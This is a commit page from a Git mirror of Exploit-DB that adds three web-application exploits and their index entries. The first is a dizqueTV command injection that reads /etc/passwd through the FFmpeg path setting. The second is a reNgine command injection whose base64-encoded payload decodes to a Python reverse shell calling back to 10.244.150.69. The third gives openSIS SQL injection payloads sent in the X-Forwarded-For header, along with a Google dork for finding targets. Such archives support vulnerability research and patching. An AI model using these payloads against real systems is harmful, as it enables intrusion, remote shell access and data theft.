bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-10-02

Browse source 
4 changes to exploits/shellcodes/ghdb

dizqueTV 1.5.3 - Remote Code Execution (RCE)

reNgine 2.2.0 - Command Injection (Authenticated)

openSIS 9.1 - SQLi (Authenticated)
This commit is contained in:
Exploit-DB 2024-10-02 00:16:50 +00:00
parent 32e0cc5e7f
commit b86fb6e1b7
4 changed files with 73 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/jsp/webapps/52079.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux
POC:
## Vulnerability Description
dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.
## STEPS TO REPRODUCE
1. go to http://localhost/#!/settings
2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"
3. click on update
4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

19
exploits/multiple/webapps/52081.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS
POC :
1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.
payload :
'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #

29
exploits/php/webapps/52080.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux
A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.
GET /Ajax.php?modname=x HTTP/1.1
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
---
FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

3
files_exploits.csv
View file

@ -5785,6 +5785,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42436,exploits/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,webapps,jsp,,2017-08-10,2017-08-10,0,,,,,,
37550,exploits/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",webapps,jsp,,2012-07-31,2015-07-10,1,,,,,,https://www.securityfocus.com/bid/54733/info
51082,exploits/jsp/webapps/51082.txt,"Desktop Central 9.1.0 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,jsp,,2023-03-27,2023-03-27,0,,,,,,
52079,exploits/jsp/webapps/52079.txt,"dizqueTV 1.5.3 - Remote Code Execution (RCE)",2024-10-01,"Ahmed Said Saud Al-Busaidi",webapps,jsp,,2024-10-01,2024-10-01,0,,,,,,
46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,,2019-05-10,2019-05-10,0,,,,,,
34928,exploits/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",webapps,jsp,,2014-10-09,2014-10-09,0,OSVDB-113063;OSVDB-113062;OSVDB-113061;OSVDB-113060;OSVDB-113059,,,,,
39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80,2016-02-02,2016-02-02,0,CVE-2015-4593;CVE-2015-4594;CVE-2015-4592;CVE-2015-4591,,,,,
@ -12219,6 +12220,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,,
10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,,
46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
@ -25373,6 +25375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",webapps,php,,2012-11-20,2016-10-24,1,,,,,,https://www.securityfocus.com/bid/56598/info
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",2021-09-03,"Eric Salario",webapps,php,,2021-09-03,2021-10-22,0,CVE-2021-40651,,,,,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",2021-09-29,"Eric Salario",webapps,php,,2021-09-29,2021-09-29,0,,,,,,
52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2024-10-01,0,,,,,,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",2021-09-02,"Eric Salario",webapps,php,,2021-09-02,2021-09-03,0,,,,,,
50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",2022-01-05,securityforeveryone.com,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,webapps,php,,2011-01-07,2011-01-07,0,,,,,http://www.exploit-db.comopensite-v0.2.2-beta.zip,

Can't render this file because it is too large.